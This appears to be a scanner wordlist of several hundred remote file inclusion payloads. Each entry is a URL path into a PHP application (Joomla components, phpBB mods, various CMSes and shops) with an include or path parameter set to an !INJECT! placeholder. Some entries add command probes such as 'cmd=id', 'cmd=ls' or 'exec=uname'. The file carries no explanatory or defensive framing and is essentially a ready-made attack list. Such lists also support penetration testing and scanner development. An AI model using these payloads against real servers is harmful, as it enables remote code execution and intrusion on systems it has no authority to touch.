/Mamblog/admin.mamblog.php?cfgfile=!INJECT!
/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=!INJECT!?
/NuclearBB/tasks/send_queued_emails.php?root_path=!INJECT!?
/OpenSiteAdmin/indexFooter.php?path=!INJECT!%00
/OpenSiteAdmin/pages/pageHeader.php?path=!INJECT!?
/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/FieldManager.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/Filter.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/Form.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/FormManager.php?path=!INJECT!%00
/OpenSiteAdmin/scripts/classes/LoginManager.php?path=!INJECT!%00
/PHP/includes/header.inc.php?root=!INJECT!?
/PHPDJ_v05/dj/djpage.php?page=!INJECT!?
/PaTh/index.php?rootpath=!INJECT!
/Path_Script/createurl.php?formurl=!INJECT!
/PhotoCart/adminprint.php?admin_folder=!INJECT!
/Picssolution/install/config.php?path=!INJECT!?
/RGboard/include/footer.php?_path[counter]=!INJECT!?
/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=!INJECT!?
/SQuery/lib/gore.php?libpath=!INJECT!
/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=!INJECT!?
/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=!INJECT!?
/ScriptPage/source/includes/load_forum.php?mfh_root_path=!INJECT!
/ScriptPath/footers.php?tinybb_footers=!INJECT!
/ScriptPath/index.php?page=!INJECT!
/Script_Path/config.inc.php?_path=!INJECT!?
/Scripts/app_and_readme/navigator/index.php?page=!INJECT!
/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=!INJECT!
/Somery/team.php?checkauth=!INJECT!
/Upload/install.php?skindir=!INJECT!
/Widgets/Base/Footer.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifContainer.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifRoot.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifRoot2.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifRoot3.php?sys_dir=!INJECT!
/Widgets/Base/widget.BifWarning.php?sys_dir=!INJECT!
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=!INJECT!?
/[path]/mybic_server.php?file=!INJECT!
/[path]/previewtheme.php?theme=1&inc_path=!INJECT!?cmd
/_administration/securite.php?cfg[document_uri]=!INJECT!
/_blogadata/include/struct_admin.php?incl_page=!INJECT!?
/_conf/_php-core/common-tpl-vars.php?admindir=!INJECT!
/_connect.php?root=!INJECT!
/_friendly/core/data/_load.php?friendly_path=!INJECT!
/_friendly/core/data/yaml.inc.php?friendly_path=!INJECT!
/_friendly/core/display/_load.php?friendly_path=!INJECT!
/_friendly/core/support/_load.php?friendly_path=!INJECT!
/_functions.php?prefix=!INJECT!
/_includes/settings.inc.php?approot=!INJECT!
/_theme/breadcrumb.php?rootBase=!INJECT!
/_wk/wk_lang.php?WK[wkPath]=!INJECT!
/abf_js.php?abs_pfad=!INJECT!?&cmd=id
/about.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/about.php?bibtexrootrel=!INJECT!?
/aboutinfo.php?bibtexrootrel=!INJECT!?
/acc.php?page=!INJECT!
/access/login.php?path_to_root=!INJECT!
/account.php?insPath=!INJECT!
/accsess/login.php?path_to_root=!INJECT!
/active/components/xmlrpc/client.php?c[components]=!INJECT!
/ad_main.php?_mygamefile=!INJECT!
/add.cgi.php?blog_theme=!INJECT!
/add_link.php?blog_theme=!INJECT!
/addpost_newpoll.php?addpoll=preview&thispath=!INJECT!
/addressbook.php?GLOBALS[basedir]=!INJECT!?
/addsite.php?returnpath=!INJECT!
/addvip.php?msetstr["PROGSDIR"]=!INJECT!
/adm/krgourl.php?DOCUMENT_ROOT=!INJECT!?
/adm/my_statistics.php?DOCUMENT_ROOT=!INJECT!?
/admin.loudmouth.php?mainframe=!INJECT!
/admin.php?Madoa=!INJECT!?
/admin.php?cal_dir=!INJECT!
/admin.php?env_dir=!INJECT!
/admin.php?lang=!INJECT!
/admin.php?page[path]=!INJECT!?&cmd=ls
/admin.php?submit=submit&form_include_template=!INJECT!
/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
/admin/ST_countries.php?include_path=!INJECT!?
/admin/ST_platforms.php?include_path=!INJECT!?
/admin/addentry.php?phpbb_root_path=!INJECT!?
/admin/addons/archive/archive.php?adminfolder=!INJECT!
/admin/admin.php?path=!INJECT!
/admin/admin.php?site_url=!INJECT!
/admin/admin_forgotten_password.php?root_folder_path=!INJECT!
/admin/admin_news_bot.php?root_path=!INJECT!?
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=!INJECT!
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=!INJECT!
/admin/admin_users.php?phpbb_root_path=!INJECT!
/admin/auth.php?xcart_dir=!INJECT!?
/admin/auth/secure.php?cfgProgDir=!INJECT!?
/admin/autoprompter.php?CONFIG[BASE_PATH]=!INJECT!
/admin/bin/patch.php?INSTALL_FOLDER=!INJECT!
/admin/catagory.php?language=!INJECT!
/admin/classes/pear/OLE/PPS.php?homedir=!INJECT!
/admin/classes/pear/OLE/PPS/File.php?homedir=!INJECT!
/admin/classes/pear/OLE/PPS/Root.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=!INJECT!
/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=!INJECT!
/admin/code/index.php?load_page=!INJECT!
/admin/comment.php?config[installdir]=!INJECT!
/admin/common-menu.php?CONF[local_path]=!INJECT!
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=!INJECT!?
/admin/config_settings.tpl.php?include_path=!INJECT!?&cmd=id
/admin/directory.php?config[installdir]=!INJECT!
/admin/doeditconfig.php?thispath=../includes&config[path]=!INJECT!
/admin/frontpage_right.php?loadadminpage=!INJECT!
/admin/header.php?loc=!INJECT!
/admin/inc/add.php?format_menue=!INJECT!
/admin/inc/change_action.php?format_menue=!INJECT!
/admin/include/common.php?commonIncludePath=!INJECT!?
/admin/include/header.php?repertoire=!INJECT!?
/admin/include/lib.module.php?mod_root=!INJECT!
/admin/includes/admin_header.php?level=!INJECT!?
/admin/includes/author_panel_header.php?level=!INJECT!?
/admin/includes/header.php?bypass_installed=1&secure_page_path=!INJECT!%00
/admin/includes/spaw/spaw_control.class.php?spaw_root=!INJECT!?
/admin/index.php?path_to_script=!INJECT!?&cmd=ls
/admin/index.php?pg=!INJECT!?
/admin/index.php?xtrphome=!INJECT!
/admin/index_sitios.php?_VIEW=!INJECT!
/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=!INJECT!
/admin/login.php?absolute_path=!INJECT!
/admin/news.admin.php?path_to_script=!INJECT!?&cmd=ls
/admin/news.php?language=!INJECT!
/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=!INJECT!
/admin/sendmsg.php?config[installdir]=!INJECT!
/admin/setup/level2.php?dir=!INJECT!
/admin/system/config/conf-activation.php?site_path=!INJECT!
/admin/system/include.php?skindir=!INJECT!
/admin/system/include.php?start=1&skindir=!INJECT!
/admin/system/menu/item.php?site_path=!INJECT!
/admin/system/modules/conf_modules.php?site_path=!INJECT!
/admin/templates/template_thumbnail.php?thumb_template=!INJECT!
/admin/testing/tests/0004_init_urls.php?init_path=!INJECT!?&
/admin/themes.php?config[installdir]=!INJECT!
/admin/tools/utf8conversion/index.php?path=!INJECT!?
/admin/user_user.php?language=!INJECT!
/admincp/auth/checklogin.php?cfgProgDir=!INJECT!
/admincp/auth/secure.php?cfgProgDir=!INJECT!
/adminhead.php?path[docroot]=!INJECT!
/admini/admin.php?INC=!INJECT!?
/admini/index.php?INC=!INJECT!?
/administrator/admin.php?site_absolute_path=!INJECT!?
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_color/admin.color.php?mosConfig_live_site=!INJECT!?
/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=!INJECT!?
/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=!INJECT!
/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=!INJECT!
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=!INJECT!
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_jreactions/langset.php?comPath=!INJECT!?
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=!INJECT!?
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=!INJECT!
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=!INJECT!
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=!INJECT!
/administrator/components/com_webring/admin.webring.docs.php?component_dir=!INJECT!?
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=!INJECT!
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=!INJECT!?
/administrator/menu_add.php?site_absolute_path=!INJECT!?
/administrator/menu_operation.php?site_absolute_path=!INJECT!?
/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=!INJECT!
/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=!INJECT!?
/adodb/adodb-errorpear.inc.php?ourlinux_root_path=!INJECT!
/adodb/adodb-pear.inc.php?ourlinux_root_path=!INJECT!
/adodb/adodb.inc.php?path=!INJECT!
/advanced_comment_system/admin.php?ACS_path=!INJECT!?
/advanced_comment_system/index.php?ACS_path=!INJECT!?
/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=!INJECT!?
/agenda.php3?rootagenda=!INJECT!
/agenda2.php3?rootagenda=!INJECT!
/aides/index.php?page=!INJECT!?
/ains_main.php?ains_path=!INJECT!
/ajax/loadsplash.php?full_path=!INJECT!
/ajouter.php?include=!INJECT!?
/akarru.gui/main_content.php?bm_content=!INJECT!
/akocomments.php?mosConfig_absolute_path=!INJECT!
/amazon/cart.php?cmd=add&asin=!INJECT!
/amazon/index.php?lang=!INJECT!
/amazon/info.php?asin=!INJECT!
/annonce.php?page=!INJECT!?&cmd=id
/announcements.php?phpraid_dir=!INJECT!
/anzagien.php?config[root_ordner]=!INJECT!?cmd=id
/apbn/templates/head.php?APB_SETTINGS[template_path]=!INJECT!
/api.php?t_path_core=!INJECT!?&cmd=id
/apps/apps.php?app=!INJECT!
/appserv/main.php?appserv_root=!INJECT!
/arab3upload/customize.php?path=!INJECT!?&cmd=pwd
/arab3upload/initialize.php?path=!INJECT!?&cmd=pwd
/arash_lib/class/arash_gadmin.class.php?arashlib_dir=!INJECT!
/arash_lib/class/arash_sadmin.class.php?arashlib_dir=!INJECT!
/arash_lib/include/edit.inc.php?arashlib_dir=!INJECT!
/arash_lib/include/list_features.inc.php?arashlib_dir=!INJECT!
/archive.php?scriptpath=!INJECT!?
/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=!INJECT!%00
/artlist.php?root_path=!INJECT!
/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=!INJECT!?cmd
/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
/athena.php?athena_dir=!INJECT!
/auction/auction_common.php?phpbb_root_path=!INJECT!
/auction/includes/converter.inc.php?include_path=!INJECT!?
/auction/includes/messages.inc.php?include_path=!INJECT!?
/auction/includes/settings.inc.php?include_path=!INJECT!?
/auction/phpAdsNew/view.inc.php?phpAds_path=!INJECT!
/auth.cookie.inc.php?da_path=!INJECT!
/auth.header.inc.php?da_path=!INJECT!
/auth.sessions.inc.php?da_path=!INJECT!
/auth/auth.php?phpbb_root_path=!INJECT!
/auth/auth_phpbb/phpbb_root_path=!INJECT!
/authenticate.php?default_path_for_themes=!INJECT!?
/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=!INJECT!
/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=!INJECT!
/auto_check_renewals.php?installed_config_file=!INJECT!?cmd=ls
/autoindex.php?cfg_file=!INJECT!?
/awzmb/adminhelp.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/help.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=!INJECT!
/axoverzicht.cgi?maand=!INJECT!
/b2-tools/gm-2-b2.php?b2inc=!INJECT!
/b2verifauth.php?index=!INJECT!?
/backend/addons/links/index.php?PATH=!INJECT!
/basebuilder/src/main.inc.php?mj_config[src_path]=!INJECT!???
/bb_admin.php?includeFooter=!INJECT!
/beacon/language/1/splash.lang.php?languagePath=!INJECT!
/beacon/language/1/splash.lang.php?languagePath=!INJECT!?
/belegungsplan/jahresuebersicht.inc.php?root=!INJECT!
/belegungsplan/monatsuebersicht.inc.php?root=!INJECT!
/belegungsplan/tagesuebersicht.inc.php?root=!INJECT!
/belegungsplan/wochenuebersicht.inc.php?root=!INJECT!
/bemarket/postscript/postscript.php?p_mode=!INJECT!
/biblioteca/bib_form.php?CLASSPATH=!INJECT!
/biblioteca/bib_pldetails.php?CLASSPATH=!INJECT!
/biblioteca/bib_plform.php?CLASSPATH=!INJECT!
/biblioteca/bib_plsearchc.php?CLASSPATH=!INJECT!
/biblioteca/bib_plsearchs.php?CLASSPATH=!INJECT!
/biblioteca/bib_save.php?CLASSPATH=!INJECT!
/biblioteca/bib_searchc.php?CLASSPATH=!INJECT!
/biblioteca/bib_searchs.php?CLASSPATH=!INJECT!
/biblioteca/edi_form.php?CLASSPATH=!INJECT!
/biblioteca/edi_save.php?CLASSPATH=!INJECT!
/biblioteca/gen_form.php?CLASSPATH=!INJECT!
/biblioteca/gen_save.php?CLASSPATH=!INJECT!
/biblioteca/lin_form.php?CLASSPATH=!INJECT!
/biblioteca/lin_save.php?CLASSPATH=!INJECT!
/biblioteca/luo_form.php?CLASSPATH=!INJECT!
/biblioteca/luo_save.php?CLASSPATH=!INJECT!
/biblioteca/sog_form.php?CLASSPATH=!INJECT!
/biblioteca/sog_save.php?CLASSPATH=!INJECT!
/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!
/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!?
/bild.php?config[root_ordner]=!INJECT!?&cmd=id
/bin/qte_init.php?qte_root=!INJECT!?
/bingoserver.php3?response_dir=!INJECT!
/block.php?Include=!INJECT!
/blocks/birthday.php?full_path=!INJECT!
/blocks/events.php?full_path=!INJECT!
/blocks/help.php?full_path=!INJECT!
/blogcms/admin/media.php?DIR_LIBS=!INJECT!?
/blogcms/admin/xmlrpc/server.php?DIR_LIBS=!INJECT!?
/blogcms/index.php?DIR_PLUGINS=!INJECT!?
/board/post.php?qb_path=!INJECT!
/boitenews4/index.php?url_index=!INJECT!?
/books/allbooks.php?home=!INJECT!
/books/home.php?home=!INJECT!
/books/mybooks.php?home=!INJECT!
/bp_ncom.php?bnrep=!INJECT!
/bp_ncom.php?bnrep=!INJECT!?
/bp_news.php?bnrep=!INJECT!
/bridge/enigma/E2_header.inc.php?boarddir=!INJECT!?
/bridge/yabbse.inc.php?sourcedir=!INJECT!
/bridges/SMF/logout.php?path_to_smf=!INJECT!
/bu/bu_cache.php?bu_dir=!INJECT!?
/bu/bu_claro.php?bu_dir=!INJECT!?
/bu/bu_parse.php?bu_dir=!INJECT!?
/bu/process.php?bu_dir=!INJECT!?
/buddy.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/builddb.php?env_dir=!INJECT!
/button/settings_sql.php?path=!INJECT!
/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=!INJECT!?
/cal.func.php?dir_edge_lang=!INJECT!
/calcul-page.php?home=!INJECT!
/calendar.php?cfg_dir=!INJECT!?
/calendar.php?lang=!INJECT!
/calendar.php?path_to_calendar=!INJECT!
/calendar.php?vwar_root=!INJECT!?
/calendar/demo/index.php?date=&v=!INJECT!?
/calendar/payment.php?insPath=!INJECT!
/calendario/cal_insert.php?CLASSPATH=!INJECT!
/calendario/cal_save.php?CLASSPATH=!INJECT!
/calendario/cal_saveactivity.php?CLASSPATH=!INJECT!
/cart.php?lang_list=!INJECT!
/cart_content.php?cart_isp_root=!INJECT!
/catalogg/inludes/include_once.php?include_file=!INJECT!
/catalogshop.php?mosConfig_absolute_path=!INJECT!
/cdsagenda/modification/SendAlertEmail.php?AGE=!INJECT!?
/cfagcms/themes/default/index.php?main=!INJECT!
/ch_readalso.php?read_xml_include=!INJECT!
/challenge.php?vwar_root=!INJECT!
/change_preferences2.php?target=!INJECT!?
/chat.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/chat.php?my[root]=!INJECT!?cm=id
/chat/adminips.php?banned_file=!INJECT!
/chat/users_popupL.php3?From=!INJECT!
/checkout.php?abs_path=!INJECT!
/checkout.php?abs_path=!INJECT!?
/ciamos_path/modules/forum/include/config.php?module_cache_path='!INJECT!'
/circ.php?include_path=!INJECT!?
/circolari/cir_save.php?CLASSPATH=!INJECT!
/citywriter/head.php?path=!INJECT!?
/cl_files/index.php?path_to_calendar=!INJECT!?
/claroline/auth/ldap/authldap.php?includePath=!INJECT!
/claroline/phpbb/page_tail.php?includePath=!INJECT!
/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=!INJECT!?
/class.mysql.php?path_to_bt_dir=!INJECT!
/class/Wiki/Wiki.php?c_node[class_path]=!INJECT!
/class/jpcache/jpcache.php?_PSL[classdir]=!INJECT!?exec=uname
/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=!INJECT!
/classes/Cache.class.php?rootdir=!INJECT!?
/classes/Customer.class.php?rootdir=!INJECT!?
/classes/Performance.class.php?rootdir=!INJECT!?
/classes/Project.class.php?rootdir=!INJECT!?
/classes/Representative.class.php?rootdir=!INJECT!?
/classes/User.class.php?rootdir=!INJECT!?
/classes/admin_o.php?absolutepath=!INJECT!
/classes/adodbt/sql.php?classes_dir=!INJECT!
/classes/adodbt/sql.php?classes_dir=!INJECT!?
/classes/board_o.php?absolutepath=!INJECT!
/classes/class_admin.php?PathToComment=!INJECT!?
/classes/class_comments.php?PathToComment=!INJECT!?
/classes/class_mail.inc.php?path_to_folder=!INJECT!
/classes/common.php?rootdir=!INJECT!?
/classes/core/language.php?rootdir=!INJECT!
/classes/dev_o.php?absolutepath=!INJECT!
/classes/file_o.php?absolutepath=!INJECT!
/classes/html/com_articles.php?absolute_path=!INJECT!
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=!INJECT!
/classes/query.class.php?baseDir=!INJECT!
/classes/tech_o.php?absolutepath=!INJECT!
/classified.php?insPath=!INJECT!
/classified_right.php?language_dir=!INJECT!
/classifieds/index.php?lowerTemplate=!INJECT!
/clear.php?bibtexrootrel=!INJECT!?
/clearinfo.php?bibtexrootrel=!INJECT!?
/click.php?dir=!INJECT!?
/client.php?dir=!INJECT!
/client/faq_1/PageController.php?dir=!INJECT!
/clients/index.php?src=!INJECT!
/cls_fast_template.php?fname=!INJECT!
/cm68news/engine/oldnews.inc.php?addpath=!INJECT!?&
/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=!INJECT!?
/cms/meetweb/classes/ManagerResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/RegForm.class.php?root_path=!INJECT!
/cms/meetweb/classes/RegResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/RegRightsResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/modules.php?root_path=!INJECT!
/cms/modules/form.lib.php?sourceFolder=!INJECT!?
/cms/system/openengine.php?oe_classpath=!INJECT!???
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=!INJECT!?
/cn_config.php?tpath=!INJECT!?
/coast/header.php?sections_file=!INJECT!?
/code/berylium-classes.php?beryliumroot=!INJECT!?
/code/display.php?admindir=!INJECT!?
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=!INJECT!
/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=!INJECT!?
/com_media_library/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/comments.php?AMG_serverpath=!INJECT!
/comments.php?scriptpath=!INJECT!?
/common.inc.php?CFG[libdir]=!INJECT!
/common.inc.php?CFG[libdir]=!INJECT!?
/common.inc.php?base_path=!INJECT!
/common.php?db_file=!INJECT!
/common.php?dir=!INJECT!
/common.php?ezt_root_path=!INJECT!?
/common.php?include_path=!INJECT!
/common.php?livealbum_dir=!INJECT!?
/common.php?locale=!INJECT!
/common.php?phpht_real_path=!INJECT!?
/common/db.php?commonpath=!INJECT!?
/common/func.php?CommonAbsD=!INJECT!?
/common/func.php?CommonAbsDir=!INJECT!
/community/Offline.php?sourcedir=!INJECT!?
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=!INJECT!
/components/calendar/com_calendar.php?absolute_path=!INJECT!?
/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=!INJECT!
/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=!INJECT!
/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=!INJECT!
/components/com_articles.php?absolute_path=!INJECT!?
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=!INJECT!
/components/com_calendar.php?absolute_path=!INJECT!?
/components/com_cpg/cpg.php?mosConfig_absolute_path=!INJECT!?
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=!INJECT!
/components/com_facileforms/facileforms.frame.php?ff_compath=!INJECT!
/components/com_forum/download.php?phpbb_root_path=!INJECT!
